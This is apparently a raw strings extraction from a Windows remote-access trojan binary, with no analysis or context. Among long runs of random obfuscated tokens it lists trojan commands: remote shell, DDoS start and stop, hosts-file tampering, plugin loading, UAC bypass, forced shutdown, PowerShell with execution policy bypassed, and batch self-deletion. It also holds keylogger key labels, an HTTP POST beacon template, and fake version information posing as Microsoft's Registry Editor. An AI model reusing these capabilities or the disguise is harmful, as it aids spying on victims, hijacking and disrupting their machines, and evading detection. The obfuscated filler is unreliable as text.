JD2muMRl22Y8A9ickPAZ25hAi6AVLDmdbrtM3cIzUzgyaRuHgG625Q8Z22cD5gqKPmcSTUUlqc68FCGnROuZ7
uORn2sFbgvrQFenvWwRIXty2s4y8C20QOU7zlw6HKU1TuE5zVlFfmmMatG5Rl3jiUwnaSjdgSkDlE3qqYb3PX
MnTs5Z0kZV4jP8EeQ8LSP4g1kmgQpg1nvLCAtBVVikAdnQtknrNCAZYNnlQ5sYhvwuFmuQ3b5ysYXLnix6ajL
b24fzCqTYgoGC54nnWJiqNmFdIZ86zN2oIDcKYGutB1luhIZfoOLJT6W3HJ1ZLkdptFFShiZxcaORcsy9ikn9
zryLC8p3iup16hhgju0fcQ2Rry5aQ29DgPuXcOYwummr0mlCaML3RGoPomFTUKXddfoMgeX9JVn7jSouzcWfp
cR221erXtIEMeZuF2c9a30jn7QKpeUjycC95XzxNzUDE6i0dbtcu9DTCLgAzpFiGWhyhPKYvB9Wvrvj7YNW9n
rcVkUhUrtdYReQrbk41AkJH4BEBTeh9RQylexB0qWNnOq7d8qwRuUFEtIFto7qfg9xosXBOXV8902fzlMXjno
oBVXOFCgAF56rCvI2IGbkGAv40qk2JubXbvOlpJvilEyyQImKgT9wb1CjMyGRqs13Pmj6VnmRpig3pvQ9bMLO
pQlFP2ks5G9n9w6i961zKESC4rk4fvVO78lGfw2UbHTuX5yyyYrWzTKA5Fes9tP5xeaB0L6K6FrTVfJGRZ3P1
7dBQIMF7SaO5uFJUH3zsDS118c7uIrVzaMnvZRaq9YmCfDqqy0m3KptlHjLxaoLAE5okVhFPx8OUtrcwbUlvC
Pvl7RH4z4W9jPkttOLmIHtyDLLpfDixmv0SLJ9oYniqQBhEjO2emtDmZb0QqWyFThcAyIqUQtlAvSF9jkOXYb
bkQbj5du8jkJeBmew21lJRGl8xlWwr8IG7o5U3SNE1aUBVBHuC1Oqob3lfkGIUiEYftQwS2SUTuaiwMqhHomK
c8Fiwob1wshuBd2RMB44Y1uCUfs1LeN952C8xbnMLPhLt01vKcRy9PPKUM4ok4baRPky9s8rrSe9kiVcdnUFg
CA2A6O8gbVwDom4fkQi1vTRJjWnxdvVYwRUIZKWT8SM2SpVIPg8pkMUqjPYsrm9m6zqz6EA2aHwxouM1vSEN3
uninstall
update
Urlopen
Urlhide
PCShutdown
shutdown.exe /f /s /t 0
PCRestart
shutdown.exe /f /r /t 0
PCLogoff
shutdown.exe -L
RunShell
StartDDos
StopDDos
StartReport
StopReport
\drivers\etc\hosts
Shosts
HostsMSG
Modified successfully!
HostsErr
plugin
sendPlugin
savePlugin
RemovePlugins
Plugins Removed!
OfflineGet
Plugin
Invoke
RunRecovery
Recovery
RunOptions
injRun
UACFunc
Plugin Error!
ToLower
Open [
powershell.exe
-ExecutionPolicy Bypass -File "
RxmvGfYFY7jug9QqRMhUdg3mVmI2xy4A3SFxyrhENv1t5MMKIUNfOwtFX09fIZcUUXAb20Y9gQF5Jd0PJwaDb
IUqOconhzyBgLuYZiMDsbr2KVeik7dZJnFQHOx7aOfGfvAp8e3ZB7tQV0jV9p7Rv3ZvHQxH9g7nRgXd1YpdpM
j2RcHUNST5nZaWQQyiTrwoGIyevQ3HKtkm313JVdEtaV0l5iQ3mRGbga7s7GLOGWWPtKYtVDBWEff351nSoOk
j5wiLgnNWezcgQyDMFz34pvnfKRwExCASYFEmBvooUuU6GHVeHVKAYQsyuKkf3jbzngqwY8pQwTvLvbJpw639
H1HFBvhv3UY3zAUh10zuUhO5qdVkEyqRX1frGHa2KUI1bS6rfQK7nKfpMRJ3KAtjsSHuo7T4UwDlQW20oZ2nQ
Pw4F1XaV067zP0PP9bVtFPaGi3x
2fhfPCQ3BS5KO8I3RqcaQYu6E5v
wb0aQKkX7zF6okWGhgFRat7MoNb
Dq9ae45YVvUAurwswFFi8eAUl7X
FGzgbwJ5SPEJMYFuq5mNETp65I0
tIrKIs2qoEoseOaD8FYoRkFk6Cx
t2EmO9wRB2RNSlMuAiiJrwPQCMj
F7BySMwKsdXA8sEwtoM63msPZll
M04Fvy305wfbCjQeLhiX4L9ZK9o
vGfha3OBJQyFFxgG1bx5VwmxeMz
POST / HTTP/1.1
Host:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
User-Agent:
Content-length: 5235
@echo off
timeout 3 > NUL
" /f /q
InfvWW4umHm619udSqqeYSCDvT6
KtaWLjIblxqkECkThI49ITyqnNe
ToUpper
[SPACE]
Return
[ENTER]
Escape
LControlKey
[CTRL]
RControlKey
RShiftKey
[Shift]
LShiftKey
[Back]
Capital
[CAPSLOCK: OFF]
[CAPSLOCK: ON]
MainWindowTitle
ProcessName
rz28ipjJdJM5tLwzOimFwQhYqEf
W5QGGcTHL8ue90I9OwPWXQ5daSJ
kI4EiaZ4A7FCBKHdEjQhcwQzeBZ
7uL606Ks8C8e2a6HFqQz4p7po5m
koNq759pxanzEXPdeLqIhBYfHz1
OsK0BPU7NcpvhcMlyumcvulcNZy
17cxj8FBtpMvDtR55hx9TJCHR7e
hY6MgEtZI2fGzJFB3SQIpHjjKl7
gTEBPQvfS6UZEA5xgjFBaOTF3IC
AmcN10EytvwhjxF10J1HzeKRCcM
3aZiB3P5J94c9RjCwTKjpLoXOfT
X5M6qeGBgGonnJEHWUfw2gnesVu
5UqFsnKTmT0IlpEjIBx4zA4FJD7
u95FPdqm1eEYeU9yVpQ2TMDJmwH
5ekzItl6WQvsiXo7dV14NW1vMeu
XiZNg7nqZjZavIM4KBkXL3x5c0U
GTNNL3YcJXNgxcXgItlD5PI5V9x
5mZrIjhE0oppoSdGv6KmmKJVJo5
mKE22oPhyDm6zkyNDm4mGrk6IWY
wZxoaz2FCHVndj2GKByWTlBdjEm
g5VhwIyhzrkYkOCKf0ZzmyS68kU
DIAmd8gVP414e1btZ6H9truUJ4m
EAVNPHfYMt5f9DoBYdfWjqOdggw
F70pO6wbWbR2yp8gmxQEhMkcTA5
9Dm4eF4HGTQkTpRVCBimTywDrQT
Software\
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
abcdefghijklmnopqrstuvwxyz
Err HWID
ToArray
T72VxYq43ujtAkI5A5VwBGyGvTl
6a3dOvG3dBGHF0qPN7vpWtZ2Odv
ocJNwGNscCLP4tNONOVcmUm0wBz
QNf1lIw4nsVPvqGTOlGSxBVqlMG
3OYsDvBshK7oMYJNKN8WRJiBLWV
EpQ4CZCNYHdxWwhUqW2RWFJqQT1
Bi3Jdr7WZB1pm6WXQo0svtlEimi
Mvs7n5OMKxN9AeKEvYwC6xrOFge
d3FwLXlJzehyP5DPSatgqLlVO1a
6oUpbGRq8KYR1pvMLpommMY7zeh
6jTduEum76GEEjDDrLLxB7bwFts
2mZrJxiDzsmQsWcDCwjhBooVsIK
GNPSQSNtjqPonKaQ9FATpION48M
F11r6WCodg6c7ppFSl8BYeYOzyw
TMxgOQbyLmn44u3UcJQseQML8Jy
dudBmTB246dYcJUyuC91x1OdP8M
MAG6wEzZqYaBwcNzgVrYi4HFt3t
1fnpUNtO5RJH3U0CM32SEFKlwZF
wglgW6ExCUUR7pFamCnjop7Ir7N
v8DT3oufYySIJNdcGRja6u0T3OM
2R4iTZCe9H3ylvp7d7mxlRvtoBh
ZXLOZkPubeXYVUllFLcsvL3pMIU
WUeSA2LM0bnWjNeIsRjQxZW9j7P
5VJkDovFG7NbhXEMWAWKggaUGzJ
4KCiiVkHVqojLH9cEb9pXt76vPr
SvZOJ3BWVtEWLBXYt2LFtzYrhPU
t8FfWkznDhmxIcJzE9XYzT34sQ9
vL8Phn777iXp1zC08Fdy7PrEZdX
abcdefghijklmnopqrstuvwxyz
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
CompanyName
Microsoft Corporation
FileDescription
Registry Editor
FileVersion
6.2.17763.1697
InternalName
test3.exe
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
test3.exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
6.2.17763.1697
Assembly Version
6.2.17763.1697